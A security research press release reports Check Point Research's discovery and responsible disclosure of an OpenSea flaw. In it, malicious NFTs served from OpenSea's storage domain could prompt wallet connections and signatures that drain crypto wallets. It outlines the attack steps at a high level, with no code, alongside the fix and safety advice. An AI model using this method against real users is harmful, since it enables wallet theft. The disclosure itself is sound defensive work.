After seeing reports of stolen crypto wallets triggered by free airdropped NFTs, Check Point Research (CPR) investigated OpenSea, the world’s largest NFT marketplace. The investigation led to the discovery of critical security vulnerabilities on OpenSea’s platform that, if exploited, could have led hackers to hijack user accounts and steal entire crypto wallets of users, by sending malicious NFTs.
- CPR’s research findings has prevented the thefts of crypto wallets of users
- CPR chose to investigate OpenSea after observing reports of stolen crypto wallets online
- CPR proved it was possible to steal crypto wallets of users by leveraging critical security vulnerabilities found in OpenSea’s platform
- CPR immediately and responsibly disclosed findings to OpenSea, who went onto deploy a fix in less than one hour of disclosure
Check Point Research (CPR) identified critical security flaws in OpenSea. Left unpatched, the vulnerabilities could allow hackers to hijack user accounts and steal entire cryptocurrency wallets by crafting malicious NFTs. OpenSea is known as the world’s largest NFT marketplace, recording US$3.4 billion in transaction volume in August 2021 alone.
Reports of Malicious Airdropped NFTs
CPR’s investigation of OpenSea was prompted by reports of free airdropped NFTs allegedly gifted to users. Curiosity led CPR to correspond with a victim of a stolen crypto wallet, who confirmed interacting with an airdropped object prior to account theft.
Exploitation Methodology
CPR was able to identify critical security flaws in OpenSea, proving that a malicious NFT could be used to hijack accounts and steal crypto wallets. Successful exploitation of the vulnerabilities would have required the following steps:
- Hacker creates and gifts a malicious NFT to a target victim.
- Victim views the malicious NFT, triggering a pop-up from OpenSea’s storage domain, requesting connection to the victim’s cryptocurrency wallet (such pop-ups are common in the platform on various other activities)
- Victim clicks to connect their wallet, in order to perform action on the gifted NFT, thus enabling access to the victim’s wallet.
- Hacker can obtain the money in the wallet by triggering an additional pop-up, which is also sent from OpenSea’s storage domain. The user may click on the pop-up, if they do not notice the note in the pop-up describing the transaction.
- The end-result could be theft of a user’s entire cryptocurrency wallet
Responsible Disclosure
CPR immediately and responsibly disclosed its findings to OpenSea on Sunday, September 26, 2021. In less than an hour of disclosure, OpenSea fixed the issue and verified the fix. CPR worked closely and collaboratively with the OpenSea team to ensure the fix worked correctly. OpenSea was very responsive and shared svg files containing iframe objects from their storage domain, so CPR could review together and make sure all attack vectors are closed.
How to Protect Yourself
CPR recommends being careful when receiving requests to sign your wallet online. Before you approve a request, you should carefully review what is being requested, and consider whether the request is abnormal or suspicious. If you have any doubts, you should reject the request and examine further, before providing such authorization.
Quote: Oded Vanunu, Head of Products Vulnerabilities Research at Check Point Software:
“Our interest in OpenSea sparked when we saw chatter of stolen crypto wallets online. We speculated that an attack method existed in the wild around OpenSea, so we initiated a thorough investigation of OpenSea’s platform. The result was the discovery of a way to steal crypto wallets of users, simply by sending a malicious NFT through OpenSea. We immediately and responsibly disclosed our findings to OpenSea, who quickly worked with us to deploy a fix. I believe that our research findings, and the quick action by OpenSea, will prevent thefts of crypto wallets of users. Blockchain innovation is fast-underway and NFTs are here to stay. Given the sheer pace of innovation, there is an inherent challenge in securely integrating software applications and crypto markets. Bad actors know they have an open window right now to take advantage of, with consumer adoption spiking, while security measures in this space still need to catch up. The cyber security community must step up to help pioneering blockchain technologies secure crypto assets of consumers. We sternly warn the OpenSea community to watch out for suspicious activity that may lead to theft, as we believe bad actors will continue to expand their efforts, in order to hijack crypto wallets while exploiting system vulnerabilities.”
Statement from OpenSea:
“Security is fundamental to OpenSea. We appreciate the CPR team bringing this vulnerability to our attention and collaborating with us as we investigated the matter and implemented a fix within an hour of it being brought to our attention. These attacks would have relied on users approving malicious activity through a third-party wallet provider by connecting their wallet and providing a signature for the malicious transaction. We have been unable to identify any instances where this vulnerability was exploited but are coordinating directly with third-party wallets that integrate with our platform on how to help users better identify malicious signature requests, as well as other initiatives to help users thwart scams and phishing attacks with greater efficacy. We are also doubling down on community education around security best practices and have kicked off a blog series on how to stay safe on the decentralized web. We encourage new users and seasoned veterans alike to give the series a read. Our goal is to empower the community to detect, mitigate and report attacks in the blockchain ecosystem, such as the one demonstrated by CPR.”